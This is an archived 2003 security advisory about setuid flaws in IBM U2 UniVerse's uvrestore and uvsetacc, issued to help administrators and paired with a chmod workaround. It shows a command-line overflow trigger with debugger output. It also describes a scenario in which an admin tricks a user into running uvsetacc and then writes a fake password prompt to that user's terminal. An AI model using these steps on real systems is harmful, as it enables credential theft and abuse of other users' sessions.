what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SRT2003-07-07-0913.txt

SRT2003-07-07-0913.txt
Posted Jul 17, 2003
Authored by Strategic Reconnaissance Team | Site secnetops.com

Secure Network Operations, Inc. Advisory SRT2003-07-07-0913 - IBM U2 UniVerse version 10.0.0.9 and below commits some abnormal suid behavior in its uvrestore and setacc applications allowing an attacker to monitor other user ttys and more.

tags | exploit
SHA-256 | 2c90d30100f5f984b3cf32a5c64662112d4acdb4e1ed35b55f059aa383f79e89

SRT2003-07-07-0913.txt

Change Mirror Download
Secure Network Operations, Inc.           http://www.secnetops.com
Strategic Reconnaissance Team research@secnetops.com
Team Lead Contact kf@secnetops.com


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security. Our mission is to facilitate a
secure and reliable Internet and inter-enterprise communications
infrastructure through the products and services we offer.


Quick Summary:
************************************************************************
Advisory Number : SRT2003-07-07-0913
Product : IBM U2 UniVerse
Version : Version <= 10.0.0.9 ?
Vendor : http://ibm.com/software/data/u2/universe/
Class : local
Criticality : Low
Operating System(s) : Only confirmed on Linux (other unix based?)


High Level Explanation
************************************************************************
High Level Description : Abnormal suid behavior in several applications
What to do : chmod -s /usr/ibm/uv/bin/uvrestore
chmod -s /usr/ibm/uv/bin/setacc


Technical Details
************************************************************************
Proof Of Concept Status : No PoC necessary
Low Level Description :

UniVerse is an extended relational database designed for embedding in
vertical applications. Its nested relational data model results in
intuitive data modeling and fewer resulting tables. UniVerse provides
data access, storage and management capabilities across Microsoft®
Windows® NT, Linux and UNIplatform.

Several several binaries have odd behavior including core dumps and
changing permissions on device files.

The intent of the below gdb and strace dumps is only to show why we
feel these issues are difficult to exploit on linux. We do not feel
that we are disclosing Intellectual Property in any way. No anti
debug routines are enforced by the below applications. The point is
to show what calls are causing the problem. The result could vary on
a different unix platform or processor.

uvrestore suffers from a command line overflow:

(gdb) r `perl -e 'print "A" x 6000'`
Starting program: uvrestore `perl -e 'print "A" x 6000'`
Program received signal SIGSEGV, Segmentation fault.
0x0805e81a in basename ()
(gdb) bt
#0 0x0805e81a in basename ()
#1 0x080619b3 in basename ()
#2 0x42015574 in libc_start_main () from /lib/tls/libc.so.6
(gdb) i r
eax 0x41414141 1094795585

...
[0805e6ec] strcmp("AAAAAAAAAAAAAAAAAAAAAAAAA"..., "-noindexfix") = 1
[0805e771] strcmp("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., "-") = 1
[0805e7f3] strcpy(0x083b7d00, "AAAAAAAAAAAAAAAAAAA"...) = 0x083b7d00
[0805e815] strcpy(0x083b9100, "AAAAAAAAAAAAAAAAAAA"...) = 0x083b9100
[0805e81a] --- SIGSEGV (Segmentation fault) ---

uvsetacc does a chmod based on ttyname() results:

[root@vegeta bin]# ltrace ./uvsetacc 2557
ttyname(1) = "/dev/pts/1"
chmod("/dev/pts/1", 04775) = 0

[kf@vegeta kf]$ ls -al /dev/pts/1
crw------- 1 kf tty 136, 1 Jul 7 21:40 /dev/pts/1
[kf@vegeta kf]$ /usr/ibm/uv/bin/uvsetacc 2557
[kf@vegeta kf]$ ls -al /dev/pts/1
crwsrwxr-x 1 kf tty 136, 1 Jul 7 21:41 /dev/pts/1

--- farfetched - disgruntled helpdesk worker attack scenario ---

Helpdesk phone *ring*...
uvadm-> hello
boss-> my universe program xyz is acting weird

uvadm finds boss's tty. *grin*
kf pts/1 - 9:42pm 1:02 0.16s 0.16s /bin/bash

[uvadm@vegeta uvadm]$ id
uid=503(uvadm) gid=503(uvadm) groups=503(uvadm)
[uvadm@vegeta uvadm]$ cat /dev/pts/1
cat: /dev/pts/1: Permission denied

uvadm-> hrmm try typing this and lets see what happens...
"/usr/ibm/uv/bin/uvsetacc 2559"
boss-> ok I typed it... now what?
uvadm-> do you see the password prompt?

[uvadm@vegeta uvadm]$ ls -al /dev/pts/1
crwsrwxrwx 1 kf tty 136, 1 Jul 7 21:48 /dev/pts/1
[uvadm@vegeta uvadm]$ echo Enter Your Universe Password: >> /dev/pts/1

boss-> oh yeah hold on let me type the password in.
...

In order to exploit the uvsetacc behvior, you must be logged in as user
uvadm. The creation and use of the Unix user 'uvadm' is optional for
UniVerse. It is not required for the successfull installation, configuration
and administration of UniVerse. The intended use of uvadm is to allow a
selected, specific non-root user to perform all aspects of UniVerse
administration.

Patch or Workaround : chmod -s /usr/ibm/uv/bin/uvrestore
chmod -s /usr/ibm/uv/bin/setacc

Vendor Status : The IBM U2 staff will have this issue resolved
in a future release of IBM U2. Patches may also be supplied on a per
client basis at IBM's disgression.

Bugtraq URL : to be assigned

------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close